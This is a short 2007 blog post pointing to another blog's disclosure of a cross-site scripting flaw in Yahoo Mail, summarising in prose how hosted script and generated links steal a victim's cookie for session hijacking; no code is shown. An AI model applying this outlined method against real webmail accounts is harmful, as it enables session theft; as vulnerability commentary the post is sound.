Friday, June 15, 2007

Yahoo Mail XSS Vulnerability

Here are some details about a XSS vulnerability in Yahoo Mail on the Net Cookies blog.

The posting has two sets of code, one to be hosted on a web server and the other, a Ruby script, for generating links to the Yahoo vulnerability. The attacker then runs the address of the hosted code through the Ruby script.

This isn't rocket science. It's a textbook XSS exploit, where XSS is used to steal a cookie, send it to the hacker's server, where it's used to hack the victim's session.

The post has a lot of detail not only about the exploit but about the apathy of the developer community toward XSS despite how rampant a problem it is.

It's that easy.


Post a Comment

Links to this post:

Create a Link

<< Home